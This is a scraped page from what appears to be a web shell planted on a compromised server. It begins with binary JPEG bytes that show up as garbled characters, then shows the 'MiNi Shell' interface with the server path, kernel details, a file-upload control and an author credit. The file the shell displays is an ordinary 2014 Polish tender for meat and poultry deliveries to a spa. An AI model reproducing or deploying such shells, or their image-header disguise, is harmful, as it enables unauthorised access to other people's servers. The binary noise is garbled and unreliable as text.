JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140509/157526-N-2014.html

<p class="kh_header"><b>Lądek-Zdrój: Sukcesywne dostawy mięsa i produktów mięsnych oraz drobiu dla Uzdrowiska Lądek-Długopole S.A</b><br>
<b>Numer ogłoszenia: 157526 - 2014; data zamieszczenia: 09.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uzdrowisko Lądek-Długopole S.A. , ul. Wolności 4, 57-540 Lądek-Zdrój, woj. dolnośląskie, tel. 74 8 115 470, faks 74 8 115 470.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uzdrowisko-ladek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Podmiot Leczniczy- Spółka Akcyjna Województwa Dolnośląskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne dostawy mięsa i produktów mięsnych oraz drobiu dla Uzdrowiska Lądek-Długopole S.A.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia  są  sukcesywne  dostawy  mięsa i produktów mięsnych oraz drobiu w ilości i asortymencie określonym w załącznikach  nr 1a  i/lub 1b do SIWZ.    
2.  Przedmiot zamówienia winien być wytwarzany zgodnie z obowiązującymi przepisami, a w szczególności  z:
  a) Ustawą z dnia 25.08.2006  r. o bezpieczeństwie  żywności i żywienia (Dz. U. z 2010r. Nr 136,  poz. 914 z późn. zm. )  oraz aktami wykonawczymi wydanymi na podstawie tej ustawy,
  b) Rozporządzeniem Ministra Rolnictwa i Rozwoju Wsi z dnia 10 lipca 2007r. w sprawie znakowania  środków spożywczych i dozwolonych substancji dodatkowych (Dz. U. Nr 137 poz. 966 z późn. zm.).
3.   Warunki dodatkowe dotyczące przedmiotu zamówienia: 
Dostawy przedmiotu zamówienia winny być  realizowane do obiektów Uzdrowiska Lądek-Długopole  SA, do magazynów  żywnościowych położonych w punktach żywienia  w Lądku Zdroju (Szp. Uzdr.  Jubilat,  ul. Wolności 4a  i Szp. Uzdr. Jan, ul. Paderewskiego 7 ) oraz w Długopolu Zdroju  (Szp. Uzdr. Mieszko, ul. Zdrojowa 8 i Szp. Uzdr. Dąbrówka, ul. Wolna 4), transportem  Wykonawcy i na jego koszt .
4.   Przedmiot zamówienia winien być dostarczony wyłącznie specjalistycznym środkiem transportu - chłodnią,  spełniającym   warunki określone w Rozporządzeniu Ministra Zdrowia z dnia 25.08.2006 roku w  sprawie bezpieczeństwa żywności i  żywienia ( D.U nr j.w.).
5.   Każde zamówienie Zamawiającego będzie składane na piśmie (dopuszczalna jest  forma faksu,  e-maila i telefoniczna ), przez  specjalistę ds. żywienia lub magazyniera, do godziny 10:00 w dniu poprzedzającym dostawę z określeniem asortymentu i jego ilości.
6.   Wykonawca zobowiązuje się do dostaw towarów,  które będą odbywały się w okresie  obowiązywania   umowy - sukcesywnie- w/g ustalonego, tygodniowego harmonogramu tj.: 

-- Dla mięsa i produktów mięsnych:  dwa  razy w tygodniu -  w poniedziałki i czwartki w godzinach od 7:00 - 11:00 a w uzasadnionych   przypadkach także w inne dni wskazane przez Zamawiającego,  na podstawie  szczegółowych zamówień  z poszczególnych obiektów, złożonych pisemnie, telefonicznie,  (faksem) lub e - mailem przez osoby upoważnione przez Zamawiającego, zgodnie z formularzem cenowym -  załącznikiem nr 1a do SIWZ.   
Towary muszą spełniać wszelkie wymagania przewidziane obowiązującym prawem tj.: zgodnie z obowiązującymi normami, w  szczególności wszelkie wymagania weterynaryjne. 
Zamawiający wymaga stałości cen w części 1  w okresie obowiązywania umowy.
Jednakże w przypadku udokumentowanej zmiany cen żywca  o minimum 30% w stosunku  do cen obowiązujących w dniu podpisania umowy Strony zastrzegają sobie prawo negocjowania cen, które zostaną zatwierdzone aneksem do umowy, przy czym wzrost cen lub ich spadek nie może  przekroczyć procentowej różnicy zmiany cen.
 Podstawą do wykazania wzrostu /spadku cen żywca będą notowania Wojewódzkiego Ośrodka Doradztwa Rolniczego znajdującego się na terenie działania Wykonawcy.

-- Dla dostaw drobiu:    trzy  razy w tygodniu  tj. w poniedziałki, środy i piątki , a w uzasadnionych   przypadkach także w inne dni wskazane przez Zamawiającego,  w godzinach od 7:00 do  10:00,  na podstawie  szczegółowych zamówień  z poszczególnych obiektów, złożonych pisemnie, telefonicznie, (faksem) lub e - mailem przez osoby upoważnione przez Zamawiającego, zgodnie z formularzem cenowym -  załącznikiem nr 1b do SIWZ.   
Zamawiający wymaga stałości cen w części 2  w okresie obowiązywania umowy.
Jednakże w przypadku udokumentowania zmiany cen przewyższających 30%   w  stosunku do cen  obowiązujących w dniu podpisania umowy, Strony zastrzegają sobie  prawo  zmiany cen, które  zostaną  zatwierdzone aneksem do umowy  i zmiana taka traktowana będzie jako wyczerpująca przesłanki przewidziane w art. 144 ustawy prawo zamówień publicznych. 
7.  Wykonawca zobowiązuje się realizować na  rzecz  Zamawiającego systematycznie dostawy produktów  wyszczególnionych  w formularzach  cenowych  stanowiących  załączniki nr  1a  i/lub 1b do SIWZ.
8.  Wykonawca będzie wykonywał dostawy na podstawie szczegółowych zamówień z poszczególnych obiektów złożonych pisemnie (dopuszczalna jest  forma faksu i e-maila ),  w trakcie bieżącej dostawy przez osoby upoważnione przez Zamawiającego.
9.  Ze strony Zamawiającego upoważnionymi do odbioru towaru i sprawdzenia jego jakości są upoważnieni pracownicy Działu Żywienia. 
10.  Dostarczane produkty winny spełniać wszystkie wymogi określone w  obowiązujących dla nich  normach. Mięso i produkty mięsne oraz drób  muszą charakteryzować się odpowiednim smakiem, zapachem  i wyglądem, właściwym dla danego produktu. Dostarczane do Zamawiającego mięsa i produkty mięsne muszą pochodzić od producentów będących pod opieką weterynaryjną i sanitarną. 
Zamawiający  wymaga aby  produkty  posiadały  oznaczony termin przydatności do spożycia i powinny być dostarczane  nie później  jak przed upływem połowy tego terminu.
11.  W razie wątpliwości co do jakości dostarczanych produktów, Zamawiający zleci przeprowadzenie badań przez specjalistyczne laboratorium. W razie stwierdzenia odchyleń od normy, kosztami badania obciążony zostanie Wykonawca.
12.  Ewentualne zmiany dotyczące zamówienia będą odbywać się w formie telefonicznej. Wykonawca  gwarantuje Zamawiającemu, że przedmiot zamówienia będzie wolny od cech powszechnie  uznawanych za wady jakościowe takie jak: gorzki, kwaśny zbyt słony smak, stęchły, zanieczyszczony mechanicznie, z objawami pleśni, psucia, zawilgocenia oraz uszkodzenia.
13. Opakowanie i oznakowanie dostawy:  
     1)  Przedmiot zamówienia dostarczany będzie w opakowaniach  zbiorczych - koszach plastikowych, zamykanych  odpowiednio oznakowanych zgodnie z przepisami, ułożony wg  asortymentu w sposób gwarantujący zachowanie najwyższej jakości produktu. 
14.   Towar dostarczony przez Wykonawcę musi być:
      -  I gatunku, pozbawiony wad, odpowiadający wymaganym cechom dostarczanego produktu co do koloru, zapachu i konsystencji, 
      -  opatrzony w odpowiednie oznakowanie zawierające: nazwę producenta, warunki przechowywania i datę przydatności do spożycia,
      -  posiadać właściwe atesty, stosownie do obowiązujących przepisów.
15.   Zamawiający informuje, że ilości i asortyment podane w formularzach cenowych są jedynie szacunkowymi  i mogą ulec zmianie (zmniejszeniu lub zwiększeniu) w czasie trwania umowy w zależności od  rodzaju stosowanych  diet i ilości przyjmowanych kuracjuszy z  zastrzeżeniem, że łączna wartość  dostaw  nie może przekroczyć całkowitej wartości oferty  Wykonawcy. 
16.   Należność Wykonawcy  oparta na wystawionej fakturze zostanie przelana na konto Wykonawcy, w  terminie 21 dni  od daty dostarczenia Zamawiającemu faktury VAT (+WZ), wystawionej na koniec  tygodnia   dla części 1 i/ lub 2 zamówienia.   
Zakres zamówienia zawiera się w kwocie o wartości szacunkowej powyżej 30 000 Euro a poniżej progów ustalonych na podstawie art. 11 ust.8 ustawy Prawo zamówień publicznych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.11.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium dla całego zamówienia w wysokości:  15 000,00 zł. (słownie:  piętnaście tysięcy  złotych) w tym: 
   Dla części   1 -     12 000,00 zł.     (słownie: dwanaście  tysięcy  zł)
   Dla części   2 -       3 000,00 zł.     (słownie: trzy tysiące  zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna przedłożenie oświadczenia o posiadaniu uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania wg zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna przedłożenie  wykazu wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych główych  dostaw, min. 1 dostawy ( dla każdej części zamówienia), polegających na dostarczeniu produktów spożywczych tj. mięsa i produktów mięsnych o wartości brutto  na co   najmniej: 600 tys. zł (słownie: sześćset tysięcy złotych) dla części 1 oraz o wartości  brutto na co najmniej  170 tys. zł. (słownie: sto siedemdziesiąt tysięcy złotych) dla  części 2, w okresie ostatnich trzech lat  przed upływem
terminu składania ofert a jeżeli okres prowadzenia  działalności jest krótszy - w
tym  okresie, wraz  z podaniem przedmiotu, daty wykonania i  podmiotu, na rzecz którego dostawa  została wykonana oraz załączeniem po min. 1  poświadczeniu -  dowodu potwierdzającego, że dostawa została wykonana lub jest  wykonywana należycie - wg zał. nr 5 do SIWZ (Doświadczenie Wykonawcy)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie warunku złożenie oświadczenia o posiadaniu potencjału technicznego niezbędnego do wykonania zamówienia wg załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie warunku złożenie oświadczenia o dysponowaniu osobami zdolnymi do wykonania zamówienia wg załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełnienie warunku złożenie oświadczenia o znajdowaniu się w sytuacji ekonomicznej i finansowej  pozwalającej na wykonanie zamówienia wg załącznika nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>- minimalnie 1 dostawa (dla każdej części  zamówienia), polegająca na dostarczeniu produktów spożywczych tj. mięsa i produktów mięsnych o wartości brutto na co najmniej: 600 tys. zł (słownie: sześćset tysięcy złotych) dla części 1 oraz  o wartości brutto na co najmniej:  170 tys. zł.(słownie: sto siedemdziesiąt tysięcy złotych) dla części 2 zamówienia.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) decyzje odpowiednich służb sanitarnych o posiadaniu/dysponowaniu minimum jednym specjalistycznym środkiem transportu (chłodnią) do przewozu artykułów spożywczych tj. mięsa, produktów  mięsnych oraz drobiu. 
b) Oświadczenia Wykonawcy o stosowaniu lub wdrażaniu systemu HACCP w firmie oraz wdrożonym lub wdrażanym GMP (dobra praktyka produkcyjna) i GHP (dobra praktyka higieniczna).
c) Oświadczenia Wykonawcy, że mięsa i produkty mięsne pochodzą od producentów będacych pod opieką weterynaryjną i sanitarną</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może zostać dokonana w formie aneksu w wypadku zaistnienia następujących okoliczności:
   -  zmiany wysokości podatku VAT od towarów i usług,
   -  niewykorzystaniu w pełnym zakresie zamówień umożliwiające przedłużenie czasu trwania  umowy o następne okresy,
   -  w przypadku udokumentowanej zmiany cen żywca o minimum 30% w  stosunku do  cen obowiązujących w dniu podpisania umowy (w części 1),
   -  w przypadku udokumentowanej zmiany cen towarów o minimum 30% w  stosunku do cen obowiązujących w dniu podpisania umowy (w części 2).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uzdrowisko-ladek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uzdrowisko Lądek-Długopole S.A. , 57-540 Lądek Zdrój, ul. Wolności 4, pokój nr 4 (Dział Zamówień Publicznych i Zaopatrzenia).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2014 godzina 11:00, miejsce: Uzdrowisko Lądek-Długopole S.A. , 57-540 Lądek Zdrój, ul. Wolności 4, pokój nr 105 (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com